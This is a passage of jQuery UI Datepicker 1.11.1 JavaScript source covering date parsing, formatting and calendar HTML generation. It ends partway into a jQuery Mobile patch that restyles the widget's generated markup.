names of the months (optional) * @return Date - the extracted date value or null if value is blank */ parseDate: function (format, value, settings) { if (format == null || value == null) { throw "Invalid arguments"; } value = (typeof value === "object" ? value.toString() : value + ""); if (value === "") { return null; } var iFormat, dim, extra, iValue = 0, shortYearCutoffTemp = (settings ? settings.shortYearCutoff : null) || this._defaults.shortYearCutoff, shortYearCutoff = (typeof shortYearCutoffTemp !== "string" ? shortYearCutoffTemp : new Date().getFullYear() % 100 + parseInt(shortYearCutoffTemp, 10)), dayNamesShort = (settings ? settings.dayNamesShort : null) || this._defaults.dayNamesShort, dayNames = (settings ? settings.dayNames : null) || this._defaults.dayNames, monthNamesShort = (settings ? settings.monthNamesShort : null) || this._defaults.monthNamesShort, monthNames = (settings ? settings.monthNames : null) || this._defaults.monthNames, year = -1, month = -1, day = -1, doy = -1, literal = false, date, // Check whether a format character is doubled lookAhead = function(match) { var matches = (iFormat + 1 < format.length && format.charAt(iFormat + 1) === match); if (matches) { iFormat++; } return matches; }, // Extract a number from the string value getNumber = function(match) { var isDoubled = lookAhead(match), size = (match === "@" ? 14 : (match === "!" ? 20 : (match === "y" && isDoubled ? 4 : (match === "o" ? 3 : 2)))), minSize = (match === "y" ? size : 1), digits = new RegExp("^\\d{" + minSize + "," + size + "}"), num = value.substring(iValue).match(digits); if (!num) { throw "Missing number at position " + iValue; } iValue += num[0].length; return parseInt(num[0], 10); }, // Extract a name from the string value and convert to an index getName = function(match, shortNames, longNames) { var index = -1, names = $.map(lookAhead(match) ? longNames : shortNames, function (v, k) { return [ [k, v] ]; }).sort(function (a, b) { return -(a[1].length - b[1].length); }); $.each(names, function (i, pair) { var name = pair[1]; if (value.substr(iValue, name.length).toLowerCase() === name.toLowerCase()) { index = pair[0]; iValue += name.length; return false; } }); if (index !== -1) { return index + 1; } else { throw "Unknown name at position " + iValue; } }, // Confirm that a literal character matches the string value checkLiteral = function() { if (value.charAt(iValue) !== format.charAt(iFormat)) { throw "Unexpected literal at position " + iValue; } iValue++; }; for (iFormat = 0; iFormat < format.length; iFormat++) { if (literal) { if (format.charAt(iFormat) === "'" && !lookAhead("'")) { literal = false; } else { checkLiteral(); } } else { switch (format.charAt(iFormat)) { case "d": day = getNumber("d"); break; case "D": getName("D", dayNamesShort, dayNames); break; case "o": doy = getNumber("o"); break; case "m": month = getNumber("m"); break; case "M": month = getName("M", monthNamesShort, monthNames); break; case "y": year = getNumber("y"); break; case "@": date = new Date(getNumber("@")); year = date.getFullYear(); month = date.getMonth() + 1; day = date.getDate(); break; case "!": date = new Date((getNumber("!") - this._ticksTo1970) / 10000); year = date.getFullYear(); month = date.getMonth() + 1; day = date.getDate(); break; case "'": if (lookAhead("'")){ checkLiteral(); } else { literal = true; } break; default: checkLiteral(); } } } if (iValue < value.length){ extra = value.substr(iValue); if (!/^\s+/.test(extra)) { throw "Extra/unparsed characters found in date: " + extra; } } if (year === -1) { year = new Date().getFullYear(); } else if (year < 100) { year += new Date().getFullYear() - new Date().getFullYear() % 100 + (year <= shortYearCutoff ? 0 : -100); } if (doy > -1) { month = 1; day = doy; do { dim = this._getDaysInMonth(year, month - 1); if (day <= dim) { break; } month++; day -= dim; } while (true); } date = this._daylightSavingAdjust(new Date(year, month - 1, day)); if (date.getFullYear() !== year || date.getMonth() + 1 !== month || date.getDate() !== day) { throw "Invalid date"; // E.g. 31/02/00 } return date; }, /* Standard date formats. */ ATOM: "yy-mm-dd", // RFC 3339 (ISO 8601) COOKIE: "D, dd M yy", ISO_8601: "yy-mm-dd", RFC_822: "D, d M y", RFC_850: "DD, dd-M-y", RFC_1036: "D, d M y", RFC_1123: "D, d M yy", RFC_2822: "D, d M yy", RSS: "D, d M y", // RFC 822 TICKS: "!", TIMESTAMP: "@", W3C: "yy-mm-dd", // ISO 8601 _ticksTo1970: (((1970 - 1) * 365 + Math.floor(1970 / 4) - Math.floor(1970 / 100) + Math.floor(1970 / 400)) * 24 * 60 * 60 * 10000000), /* Format a date object into a string value. * The format can be combinations of the following: * d - day of month (no leading zero) * dd - day of month (two digit) * o - day of year (no leading zeros) * oo - day of year (three digit) * D - day name short * DD - day name long * m - month of year (no leading zero) * mm - month of year (two digit) * M - month name short * MM - month name long * y - year (two digit) * yy - year (four digit) * @ - Unix timestamp (ms since 01/01/1970) * ! - Windows ticks (100ns since 01/01/0001) * "..." - literal text * '' - single quote * * @param format string - the desired format of the date * @param date Date - the date value to format * @param settings Object - attributes include: * dayNamesShort string[7] - abbreviated names of the days from Sunday (optional) * dayNames string[7] - names of the days from Sunday (optional) * monthNamesShort string[12] - abbreviated names of the months (optional) * monthNames string[12] - names of the months (optional) * @return string - the date in the above format */ formatDate: function (format, date, settings) { if (!date) { return ""; } var iFormat, dayNamesShort = (settings ? settings.dayNamesShort : null) || this._defaults.dayNamesShort, dayNames = (settings ? settings.dayNames : null) || this._defaults.dayNames, monthNamesShort = (settings ? settings.monthNamesShort : null) || this._defaults.monthNamesShort, monthNames = (settings ? settings.monthNames : null) || this._defaults.monthNames, // Check whether a format character is doubled lookAhead = function(match) { var matches = (iFormat + 1 < format.length && format.charAt(iFormat + 1) === match); if (matches) { iFormat++; } return matches; }, // Format a number, with leading zero if necessary formatNumber = function(match, value, len) { var num = "" + value; if (lookAhead(match)) { while (num.length < len) { num = "0" + num; } } return num; }, // Format a name, short or long as requested formatName = function(match, value, shortNames, longNames) { return (lookAhead(match) ? longNames[value] : shortNames[value]); }, output = "", literal = false; if (date) { for (iFormat = 0; iFormat < format.length; iFormat++) { if (literal) { if (format.charAt(iFormat) === "'" && !lookAhead("'")) { literal = false; } else { output += format.charAt(iFormat); } } else { switch (format.charAt(iFormat)) { case "d": output += formatNumber("d", date.getDate(), 2); break; case "D": output += formatName("D", date.getDay(), dayNamesShort, dayNames); break; case "o": output += formatNumber("o", Math.round((new Date(date.getFullYear(), date.getMonth(), date.getDate()).getTime() - new Date(date.getFullYear(), 0, 0).getTime()) / 86400000), 3); break; case "m": output += formatNumber("m", date.getMonth() + 1, 2); break; case "M": output += formatName("M", date.getMonth(), monthNamesShort, monthNames); break; case "y": output += (lookAhead("y") ? date.getFullYear() : (date.getYear() % 100 < 10 ? "0" : "") + date.getYear() % 100); break; case "@": output += date.getTime(); break; case "!": output += date.getTime() * 10000 + this._ticksTo1970; break; case "'": if (lookAhead("'")) { output += "'"; } else { literal = true; } break; default: output += format.charAt(iFormat); } } } } return output; }, /* Extract all possible characters from the date format. */ _possibleChars: function (format) { var iFormat, chars = "", literal = false, // Check whether a format character is doubled lookAhead = function(match) { var matches = (iFormat + 1 < format.length && format.charAt(iFormat + 1) === match); if (matches) { iFormat++; } return matches; }; for (iFormat = 0; iFormat < format.length; iFormat++) { if (literal) { if (format.charAt(iFormat) === "'" && !lookAhead("'")) { literal = false; } else { chars += format.charAt(iFormat); } } else { switch (format.charAt(iFormat)) { case "d": case "m": case "y": case "@": chars += "0123456789"; break; case "D": case "M": return null; // Accept anything case "'": if (lookAhead("'")) { chars += "'"; } else { literal = true; } break; default: chars += format.charAt(iFormat); } } } return chars; }, /* Get a setting value, defaulting if necessary. */ _get: function(inst, name) { return inst.settings[name] !== undefined ? inst.settings[name] : this._defaults[name]; }, /* Parse existing date and initialise date picker. */ _setDateFromField: function(inst, noDefault) { if (inst.input.val() === inst.lastVal) { return; } var dateFormat = this._get(inst, "dateFormat"), dates = inst.lastVal = inst.input ? inst.input.val() : null, defaultDate = this._getDefaultDate(inst), date = defaultDate, settings = this._getFormatConfig(inst); try { date = this.parseDate(dateFormat, dates, settings) || defaultDate; } catch (event) { dates = (noDefault ? "" : dates); } inst.selectedDay = date.getDate(); inst.drawMonth = inst.selectedMonth = date.getMonth(); inst.drawYear = inst.selectedYear = date.getFullYear(); inst.currentDay = (dates ? date.getDate() : 0); inst.currentMonth = (dates ? date.getMonth() : 0); inst.currentYear = (dates ? date.getFullYear() : 0); this._adjustInstDate(inst); }, /* Retrieve the default date shown on opening. */ _getDefaultDate: function(inst) { return this._restrictMinMax(inst, this._determineDate(inst, this._get(inst, "defaultDate"), new Date())); }, /* A date may be specified as an exact value or a relative one. */ _determineDate: function(inst, date, defaultDate) { var offsetNumeric = function(offset) { var date = new Date(); date.setDate(date.getDate() + offset); return date; }, offsetString = function(offset) { try { return $.datepicker.parseDate($.datepicker._get(inst, "dateFormat"), offset, $.datepicker._getFormatConfig(inst)); } catch (e) { // Ignore } var date = (offset.toLowerCase().match(/^c/) ? $.datepicker._getDate(inst) : null) || new Date(), year = date.getFullYear(), month = date.getMonth(), day = date.getDate(), pattern = /([+\-]?[0-9]+)\s*(d|D|w|W|m|M|y|Y)?/g, matches = pattern.exec(offset); while (matches) { switch (matches[2] || "d") { case "d" : case "D" : day += parseInt(matches[1],10); break; case "w" : case "W" : day += parseInt(matches[1],10) * 7; break; case "m" : case "M" : month += parseInt(matches[1],10); day = Math.min(day, $.datepicker._getDaysInMonth(year, month)); break; case "y": case "Y" : year += parseInt(matches[1],10); day = Math.min(day, $.datepicker._getDaysInMonth(year, month)); break; } matches = pattern.exec(offset); } return new Date(year, month, day); }, newDate = (date == null || date === "" ? defaultDate : (typeof date === "string" ? offsetString(date) : (typeof date === "number" ? (isNaN(date) ? defaultDate : offsetNumeric(date)) : new Date(date.getTime())))); newDate = (newDate && newDate.toString() === "Invalid Date" ? defaultDate : newDate); if (newDate) { newDate.setHours(0); newDate.setMinutes(0); newDate.setSeconds(0); newDate.setMilliseconds(0); } return this._daylightSavingAdjust(newDate); }, /* Handle switch to/from daylight saving. * Hours may be non-zero on daylight saving cut-over: * > 12 when midnight changeover, but then cannot generate * midnight datetime, so jump to 1AM, otherwise reset. * @param date (Date) the date to check * @return (Date) the corrected date */ _daylightSavingAdjust: function(date) { if (!date) { return null; } date.setHours(date.getHours() > 12 ? date.getHours() + 2 : 0); return date; }, /* Set the date(s) directly. */ _setDate: function(inst, date, noChange) { var clear = !date, origMonth = inst.selectedMonth, origYear = inst.selectedYear, newDate = this._restrictMinMax(inst, this._determineDate(inst, date, new Date())); inst.selectedDay = inst.currentDay = newDate.getDate(); inst.drawMonth = inst.selectedMonth = inst.currentMonth = newDate.getMonth(); inst.drawYear = inst.selectedYear = inst.currentYear = newDate.getFullYear(); if ((origMonth !== inst.selectedMonth || origYear !== inst.selectedYear) && !noChange) { this._notifyChange(inst); } this._adjustInstDate(inst); if (inst.input) { inst.input.val(clear ? "" : this._formatDate(inst)); } }, /* Retrieve the date(s) directly. */ _getDate: function(inst) { var startDate = (!inst.currentYear || (inst.input && inst.input.val() === "") ? null : this._daylightSavingAdjust(new Date( inst.currentYear, inst.currentMonth, inst.currentDay))); return startDate; }, /* Attach the onxxx handlers. These are declared statically so * they work with static code transformers like Caja. */ _attachHandlers: function(inst) { var stepMonths = this._get(inst, "stepMonths"), id = "#" + inst.id.replace( /\\\\/g, "\\" ); inst.dpDiv.find("[data-handler]").map(function () { var handler = { prev: function () { $.datepicker._adjustDate(id, -stepMonths, "M"); }, next: function () { $.datepicker._adjustDate(id, +stepMonths, "M"); }, hide: function () { $.datepicker._hideDatepicker(); }, today: function () { $.datepicker._gotoToday(id); }, selectDay: function () { $.datepicker._selectDay(id, +this.getAttribute("data-month"), +this.getAttribute("data-year"), this); return false; }, selectMonth: function () { $.datepicker._selectMonthYear(id, this, "M"); return false; }, selectYear: function () { $.datepicker._selectMonthYear(id, this, "Y"); return false; } }; $(this).bind(this.getAttribute("data-event"), handler[this.getAttribute("data-handler")]); }); }, /* Generate the HTML for the current state of the date picker. */ _generateHTML: function(inst) { var maxDraw, prevText, prev, nextText, next, currentText, gotoDate, controls, buttonPanel, firstDay, showWeek, dayNames, dayNamesMin, monthNames, monthNamesShort, beforeShowDay, showOtherMonths, selectOtherMonths, defaultDate, html, dow, row, group, col, selectedDate, cornerClass, calender, thead, day, daysInMonth, leadDays, curRows, numRows, printDate, dRow, tbody, daySettings, otherMonth, unselectable, tempDate = new Date(), today = this._daylightSavingAdjust( new Date(tempDate.getFullYear(), tempDate.getMonth(), tempDate.getDate())), // clear time isRTL = this._get(inst, "isRTL"), showButtonPanel = this._get(inst, "showButtonPanel"), hideIfNoPrevNext = this._get(inst, "hideIfNoPrevNext"), navigationAsDateFormat = this._get(inst, "navigationAsDateFormat"), numMonths = this._getNumberOfMonths(inst), showCurrentAtPos = this._get(inst, "showCurrentAtPos"), stepMonths = this._get(inst, "stepMonths"), isMultiMonth = (numMonths[0] !== 1 || numMonths[1] !== 1), currentDate = this._daylightSavingAdjust((!inst.currentDay ? new Date(9999, 9, 9) : new Date(inst.currentYear, inst.currentMonth, inst.currentDay))), minDate = this._getMinMaxDate(inst, "min"), maxDate = this._getMinMaxDate(inst, "max"), drawMonth = inst.drawMonth - showCurrentAtPos, drawYear = inst.drawYear; if (drawMonth < 0) { drawMonth += 12; drawYear--; } if (maxDate) { maxDraw = this._daylightSavingAdjust(new Date(maxDate.getFullYear(), maxDate.getMonth() - (numMonths[0] * numMonths[1]) + 1, maxDate.getDate())); maxDraw = (minDate && maxDraw < minDate ? minDate : maxDraw); while (this._daylightSavingAdjust(new Date(drawYear, drawMonth, 1)) > maxDraw) { drawMonth--; if (drawMonth < 0) { drawMonth = 11; drawYear--; } } } inst.drawMonth = drawMonth; inst.drawYear = drawYear; prevText = this._get(inst, "prevText"); prevText = (!navigationAsDateFormat ? prevText : this.formatDate(prevText, this._daylightSavingAdjust(new Date(drawYear, drawMonth - stepMonths, 1)), this._getFormatConfig(inst))); prev = (this._canAdjustMonth(inst, -1, drawYear, drawMonth) ? "<a class='ui-datepicker-prev ui-corner-all' data-handler='prev' data-event='click'" + " title='" + prevText + "'><span class='ui-icon ui-icon-circle-triangle-" + ( isRTL ? "e" : "w") + "'>" + prevText + "</span></a>" : (hideIfNoPrevNext ? "" : "<a class='ui-datepicker-prev ui-corner-all ui-state-disabled' title='"+ prevText +"'><span class='ui-icon ui-icon-circle-triangle-" + ( isRTL ? "e" : "w") + "'>" + prevText + "</span></a>")); nextText = this._get(inst, "nextText"); nextText = (!navigationAsDateFormat ? nextText : this.formatDate(nextText, this._daylightSavingAdjust(new Date(drawYear, drawMonth + stepMonths, 1)), this._getFormatConfig(inst))); next = (this._canAdjustMonth(inst, +1, drawYear, drawMonth) ? "<a class='ui-datepicker-next ui-corner-all' data-handler='next' data-event='click'" + " title='" + nextText + "'><span class='ui-icon ui-icon-circle-triangle-" + ( isRTL ? "w" : "e") + "'>" + nextText + "</span></a>" : (hideIfNoPrevNext ? "" : "<a class='ui-datepicker-next ui-corner-all ui-state-disabled' title='"+ nextText + "'><span class='ui-icon ui-icon-circle-triangle-" + ( isRTL ? "w" : "e") + "'>" + nextText + "</span></a>")); currentText = this._get(inst, "currentText"); gotoDate = (this._get(inst, "gotoCurrent") && inst.currentDay ? currentDate : today); currentText = (!navigationAsDateFormat ? currentText : this.formatDate(currentText, gotoDate, this._getFormatConfig(inst))); controls = (!inst.inline ? "<button type='button' class='ui-datepicker-close ui-state-default ui-priority-primary ui-corner-all' data-handler='hide' data-event='click'>" + this._get(inst, "closeText") + "</button>" : ""); buttonPanel = (showButtonPanel) ? "<div class='ui-datepicker-buttonpane ui-widget-content'>" + (isRTL ? controls : "") + (this._isInRange(inst, gotoDate) ? "<button type='button' class='ui-datepicker-current ui-state-default ui-priority-secondary ui-corner-all' data-handler='today' data-event='click'" + ">" + currentText + "</button>" : "") + (isRTL ? "" : controls) + "</div>" : ""; firstDay = parseInt(this._get(inst, "firstDay"),10); firstDay = (isNaN(firstDay) ? 0 : firstDay); showWeek = this._get(inst, "showWeek"); dayNames = this._get(inst, "dayNames"); dayNamesMin = this._get(inst, "dayNamesMin"); monthNames = this._get(inst, "monthNames"); monthNamesShort = this._get(inst, "monthNamesShort"); beforeShowDay = this._get(inst, "beforeShowDay"); showOtherMonths = this._get(inst, "showOtherMonths"); selectOtherMonths = this._get(inst, "selectOtherMonths"); defaultDate = this._getDefaultDate(inst); html = ""; dow; for (row = 0; row < numMonths[0]; row++) { group = ""; this.maxRows = 4; for (col = 0; col < numMonths[1]; col++) { selectedDate = this._daylightSavingAdjust(new Date(drawYear, drawMonth, inst.selectedDay)); cornerClass = " ui-corner-all"; calender = ""; if (isMultiMonth) { calender += "<div class='ui-datepicker-group"; if (numMonths[1] > 1) { switch (col) { case 0: calender += " ui-datepicker-group-first"; cornerClass = " ui-corner-" + (isRTL ? "right" : "left"); break; case numMonths[1]-1: calender += " ui-datepicker-group-last"; cornerClass = " ui-corner-" + (isRTL ? "left" : "right"); break; default: calender += " ui-datepicker-group-middle"; cornerClass = ""; break; } } calender += "'>"; } calender += "<div class='ui-datepicker-header ui-widget-header ui-helper-clearfix" + cornerClass + "'>" + (/all|left/.test(cornerClass) && row === 0 ? (isRTL ? next : prev) : "") + (/all|right/.test(cornerClass) && row === 0 ? (isRTL ? prev : next) : "") + this._generateMonthYearHeader(inst, drawMonth, drawYear, minDate, maxDate, row > 0 || col > 0, monthNames, monthNamesShort) + // draw month headers "</div><table class='ui-datepicker-calendar'><thead>" + "<tr>"; thead = (showWeek ? "<th class='ui-datepicker-week-col'>" + this._get(inst, "weekHeader") + "</th>" : ""); for (dow = 0; dow < 7; dow++) { // days of the week day = (dow + firstDay) % 7; thead += "<th scope='col'" + ((dow + firstDay + 6) % 7 >= 5 ? " class='ui-datepicker-week-end'" : "") + ">" + "<span title='" + dayNames[day] + "'>" + dayNamesMin[day] + "</span></th>"; } calender += thead + "</tr></thead><tbody>"; daysInMonth = this._getDaysInMonth(drawYear, drawMonth); if (drawYear === inst.selectedYear && drawMonth === inst.selectedMonth) { inst.selectedDay = Math.min(inst.selectedDay, daysInMonth); } leadDays = (this._getFirstDayOfMonth(drawYear, drawMonth) - firstDay + 7) % 7; curRows = Math.ceil((leadDays + daysInMonth) / 7); // calculate the number of rows to generate numRows = (isMultiMonth ? this.maxRows > curRows ? this.maxRows : curRows : curRows); //If multiple months, use the higher number of rows (see #7043) this.maxRows = numRows; printDate = this._daylightSavingAdjust(new Date(drawYear, drawMonth, 1 - leadDays)); for (dRow = 0; dRow < numRows; dRow++) { // create date picker rows calender += "<tr>"; tbody = (!showWeek ? "" : "<td class='ui-datepicker-week-col'>" + this._get(inst, "calculateWeek")(printDate) + "</td>"); for (dow = 0; dow < 7; dow++) { // create date picker days daySettings = (beforeShowDay ? beforeShowDay.apply((inst.input ? inst.input[0] : null), [printDate]) : [true, ""]); otherMonth = (printDate.getMonth() !== drawMonth); unselectable = (otherMonth && !selectOtherMonths) || !daySettings[0] || (minDate && printDate < minDate) || (maxDate && printDate > maxDate); tbody += "<td class='" + ((dow + firstDay + 6) % 7 >= 5 ? " ui-datepicker-week-end" : "") + // highlight weekends (otherMonth ? " ui-datepicker-other-month" : "") + // highlight days from other months ((printDate.getTime() === selectedDate.getTime() && drawMonth === inst.selectedMonth && inst._keyEvent) || // user pressed key (defaultDate.getTime() === printDate.getTime() && defaultDate.getTime() === selectedDate.getTime()) ? // or defaultDate is current printedDate and defaultDate is selectedDate " " + this._dayOverClass : "") + // highlight selected day (unselectable ? " " + this._unselectableClass + " ui-state-disabled": "") + // highlight unselectable days (otherMonth && !showOtherMonths ? "" : " " + daySettings[1] + // highlight custom dates (printDate.getTime() === currentDate.getTime() ? " " + this._currentClass : "") + // highlight selected day (printDate.getTime() === today.getTime() ? " ui-datepicker-today" : "")) + "'" + // highlight today (if different) ((!otherMonth || showOtherMonths) && daySettings[2] ? " title='" + daySettings[2].replace(/'/g, "&#39;") + "'" : "") + // cell title (unselectable ? "" : " data-handler='selectDay' data-event='click' data-month='" + printDate.getMonth() + "' data-year='" + printDate.getFullYear() + "'") + ">" + // actions (otherMonth && !showOtherMonths ? "&#xa0;" : // display for other months (unselectable ? "<span class='ui-state-default'>" + printDate.getDate() + "</span>" : "<a class='ui-state-default" + (printDate.getTime() === today.getTime() ? " ui-state-highlight" : "") + (printDate.getTime() === currentDate.getTime() ? " ui-state-active" : "") + // highlight selected day (otherMonth ? " ui-priority-secondary" : "") + // distinguish dates from other months "' href='#'>" + printDate.getDate() + "</a>")) + "</td>"; // display selectable date printDate.setDate(printDate.getDate() + 1); printDate = this._daylightSavingAdjust(printDate); } calender += tbody + "</tr>"; } drawMonth++; if (drawMonth > 11) { drawMonth = 0; drawYear++; } calender += "</tbody></table>" + (isMultiMonth ? "</div>" + ((numMonths[0] > 0 && col === numMonths[1]-1) ? "<div class='ui-datepicker-row-break'></div>" : "") : ""); group += calender; } html += group; } html += buttonPanel; inst._keyEvent = false; return html; }, /* Generate the month and year header. */ _generateMonthYearHeader: function(inst, drawMonth, drawYear, minDate, maxDate, secondary, monthNames, monthNamesShort) { var inMinYear, inMaxYear, month, years, thisYear, determineYear, year, endYear, changeMonth = this._get(inst, "changeMonth"), changeYear = this._get(inst, "changeYear"), showMonthAfterYear = this._get(inst, "showMonthAfterYear"), html = "<div class='ui-datepicker-title'>", monthHtml = ""; // month selection if (secondary || !changeMonth) { monthHtml += "<span class='ui-datepicker-month'>" + monthNames[drawMonth] + "</span>"; } else { inMinYear = (minDate && minDate.getFullYear() === drawYear); inMaxYear = (maxDate && maxDate.getFullYear() === drawYear); monthHtml += "<select class='ui-datepicker-month' data-handler='selectMonth' data-event='change'>"; for ( month = 0; month < 12; month++) { if ((!inMinYear || month >= minDate.getMonth()) && (!inMaxYear || month <= maxDate.getMonth())) { monthHtml += "<option value='" + month + "'" + (month === drawMonth ? " selected='selected'" : "") + ">" + monthNamesShort[month] + "</option>"; } } monthHtml += "</select>"; } if (!showMonthAfterYear) { html += monthHtml + (secondary || !(changeMonth && changeYear) ? "&#xa0;" : ""); } // year selection if ( !inst.yearshtml ) { inst.yearshtml = ""; if (secondary || !changeYear) { html += "<span class='ui-datepicker-year'>" + drawYear + "</span>"; } else { // determine range of years to display years = this._get(inst, "yearRange").split(":"); thisYear = new Date().getFullYear(); determineYear = function(value) { var year = (value.match(/c[+\-].*/) ? drawYear + parseInt(value.substring(1), 10) : (value.match(/[+\-].*/) ? thisYear + parseInt(value, 10) : parseInt(value, 10))); return (isNaN(year) ? thisYear : year); }; year = determineYear(years[0]); endYear = Math.max(year, determineYear(years[1] || "")); year = (minDate ? Math.max(year, minDate.getFullYear()) : year); endYear = (maxDate ? Math.min(endYear, maxDate.getFullYear()) : endYear); inst.yearshtml += "<select class='ui-datepicker-year' data-handler='selectYear' data-event='change'>"; for (; year <= endYear; year++) { inst.yearshtml += "<option value='" + year + "'" + (year === drawYear ? " selected='selected'" : "") + ">" + year + "</option>"; } inst.yearshtml += "</select>"; html += inst.yearshtml; inst.yearshtml = null; } } html += this._get(inst, "yearSuffix"); if (showMonthAfterYear) { html += (secondary || !(changeMonth && changeYear) ? "&#xa0;" : "") + monthHtml; } html += "</div>"; // Close datepicker_header return html; }, /* Adjust one of the date sub-fields. */ _adjustInstDate: function(inst, offset, period) { var year = inst.drawYear + (period === "Y" ? offset : 0), month = inst.drawMonth + (period === "M" ? offset : 0), day = Math.min(inst.selectedDay, this._getDaysInMonth(year, month)) + (period === "D" ? offset : 0), date = this._restrictMinMax(inst, this._daylightSavingAdjust(new Date(year, month, day))); inst.selectedDay = date.getDate(); inst.drawMonth = inst.selectedMonth = date.getMonth(); inst.drawYear = inst.selectedYear = date.getFullYear(); if (period === "M" || period === "Y") { this._notifyChange(inst); } }, /* Ensure a date is within any min/max bounds. */ _restrictMinMax: function(inst, date) { var minDate = this._getMinMaxDate(inst, "min"), maxDate = this._getMinMaxDate(inst, "max"), newDate = (minDate && date < minDate ? minDate : date); return (maxDate && newDate > maxDate ? maxDate : newDate); }, /* Notify change of month/year. */ _notifyChange: function(inst) { var onChange = this._get(inst, "onChangeMonthYear"); if (onChange) { onChange.apply((inst.input ? inst.input[0] : null), [inst.selectedYear, inst.selectedMonth + 1, inst]); } }, /* Determine the number of months to show. */ _getNumberOfMonths: function(inst) { var numMonths = this._get(inst, "numberOfMonths"); return (numMonths == null ? [1, 1] : (typeof numMonths === "number" ? [1, numMonths] : numMonths)); }, /* Determine the current maximum date - ensure no time components are set. */ _getMinMaxDate: function(inst, minMax) { return this._determineDate(inst, this._get(inst, minMax + "Date"), null); }, /* Find the number of days in a given month. */ _getDaysInMonth: function(year, month) { return 32 - this._daylightSavingAdjust(new Date(year, month, 32)).getDate(); }, /* Find the day of the week of the first of a month. */ _getFirstDayOfMonth: function(year, month) { return new Date(year, month, 1).getDay(); }, /* Determines if we should allow a "next/prev" month display change. */ _canAdjustMonth: function(inst, offset, curYear, curMonth) { var numMonths = this._getNumberOfMonths(inst), date = this._daylightSavingAdjust(new Date(curYear, curMonth + (offset < 0 ? offset : numMonths[0] * numMonths[1]), 1)); if (offset < 0) { date.setDate(this._getDaysInMonth(date.getFullYear(), date.getMonth())); } return this._isInRange(inst, date); }, /* Is the given date in the accepted range? */ _isInRange: function(inst, date) { var yearSplit, currentYear, minDate = this._getMinMaxDate(inst, "min"), maxDate = this._getMinMaxDate(inst, "max"), minYear = null, maxYear = null, years = this._get(inst, "yearRange"); if (years){ yearSplit = years.split(":"); currentYear = new Date().getFullYear(); minYear = parseInt(yearSplit[0], 10); maxYear = parseInt(yearSplit[1], 10); if ( yearSplit[0].match(/[+\-].*/) ) { minYear += currentYear; } if ( yearSplit[1].match(/[+\-].*/) ) { maxYear += currentYear; } } return ((!minDate || date.getTime() >= minDate.getTime()) && (!maxDate || date.getTime() <= maxDate.getTime()) && (!minYear || date.getFullYear() >= minYear) && (!maxYear || date.getFullYear() <= maxYear)); }, /* Provide the configuration settings for formatting/parsing. */ _getFormatConfig: function(inst) { var shortYearCutoff = this._get(inst, "shortYearCutoff"); shortYearCutoff = (typeof shortYearCutoff !== "string" ? shortYearCutoff : new Date().getFullYear() % 100 + parseInt(shortYearCutoff, 10)); return {shortYearCutoff: shortYearCutoff, dayNamesShort: this._get(inst, "dayNamesShort"), dayNames: this._get(inst, "dayNames"), monthNamesShort: this._get(inst, "monthNamesShort"), monthNames: this._get(inst, "monthNames")}; }, /* Format the given date for display. */ _formatDate: function(inst, day, month, year) { if (!day) { inst.currentDay = inst.selectedDay; inst.currentMonth = inst.selectedMonth; inst.currentYear = inst.selectedYear; } var date = (day ? (typeof day === "object" ? day : this._daylightSavingAdjust(new Date(year, month, day))) : this._daylightSavingAdjust(new Date(inst.currentYear, inst.currentMonth, inst.currentDay))); return this.formatDate(this._get(inst, "dateFormat"), date, this._getFormatConfig(inst)); } }); /* * Bind hover events for datepicker elements. * Done via delegate so the binding only occurs once in the lifetime of the parent div. * Global datepicker_instActive, set by _updateDatepicker allows the handlers to find their way back to the active picker. */ function datepicker_bindHover(dpDiv) { var selector = "button, .ui-datepicker-prev, .ui-datepicker-next, .ui-datepicker-calendar td a"; return dpDiv.delegate(selector, "mouseout", function() { $(this).removeClass("ui-state-hover"); if (this.className.indexOf("ui-datepicker-prev") !== -1) { $(this).removeClass("ui-datepicker-prev-hover"); } if (this.className.indexOf("ui-datepicker-next") !== -1) { $(this).removeClass("ui-datepicker-next-hover"); } }) .delegate( selector, "mouseover", datepicker_handleMouseover ); } function datepicker_handleMouseover() { if (!$.datepicker._isDisabledDatepicker( datepicker_instActive.inline? datepicker_instActive.dpDiv.parent()[0] : datepicker_instActive.input[0])) { $(this).parents(".ui-datepicker-calendar").find("a").removeClass("ui-state-hover"); $(this).addClass("ui-state-hover"); if (this.className.indexOf("ui-datepicker-prev") !== -1) { $(this).addClass("ui-datepicker-prev-hover"); } if (this.className.indexOf("ui-datepicker-next") !== -1) { $(this).addClass("ui-datepicker-next-hover"); } } } /* jQuery extend now ignores nulls! */ function datepicker_extendRemove(target, props) { $.extend(target, props); for (var name in props) { if (props[name] == null) { target[name] = props[name]; } } return target; } /* Invoke the datepicker functionality. @param options string - a command, optionally followed by additional parameters or Object - settings for attaching new datepicker functionality @return jQuery object */ $.fn.datepicker = function(options){ /* Verify an empty collection wasn't passed - Fixes #6976 */ if ( !this.length ) { return this; } /* Initialise the date picker. */ if (!$.datepicker.initialized) { $(document).mousedown($.datepicker._checkExternalClick); $.datepicker.initialized = true; } /* Append datepicker main container to body if not exist. */ if ($("#"+$.datepicker._mainDivId).length === 0) { $("body").append($.datepicker.dpDiv); } var otherArgs = Array.prototype.slice.call(arguments, 1); if (typeof options === "string" && (options === "isDisabled" || options === "getDate" || options === "widget")) { return $.datepicker["_" + options + "Datepicker"]. apply($.datepicker, [this[0]].concat(otherArgs)); } if (options === "option" && arguments.length === 2 && typeof arguments[1] === "string") { return $.datepicker["_" + options + "Datepicker"]. apply($.datepicker, [this[0]].concat(otherArgs)); } return this.each(function() { typeof options === "string" ? $.datepicker["_" + options + "Datepicker"]. apply($.datepicker, [this].concat(otherArgs)) : $.datepicker._attachDatepicker(this, options); }); }; $.datepicker = new Datepicker(); // singleton instance $.datepicker.initialized = false; $.datepicker.uuid = new Date().getTime(); $.datepicker.version = "1.11.1"; var datepicker = $.datepicker; })); /* * jQuery Mobile: jQuery UI Datepicker Monkey Patch * http://salman-w.blogspot.com/2014/03/jquery-ui-datepicker-for-jquery-mobile.html */ (function() { // use a jQuery Mobile icon on trigger button $.datepicker._triggerClass += " ui-btn ui-btn-right ui-icon-carat-d ui-btn-icon-notext ui-corner-all"; // replace jQuery UI CSS classes with jQuery Mobile CSS classes in the generated HTML $.datepicker._generateHTML_old = $.datepicker._generateHTML; $.datepicker._generateHTML = function(inst) { return $("<div></div>").html(this._generateHTML_old(inst)) .find(".ui-datepicker-header").removeClass("ui-widget-header ui-helper-clearfix").addClass("ui-bar-inherit").end() .find(".ui-datepicker-prev").addClass("ui-btn ui-btn-left ui-icon-carat-l ui-btn-icon-notext").end() .find(".ui-datepicker-next").addClass("ui-btn ui-btn-right ui-icon-carat-r 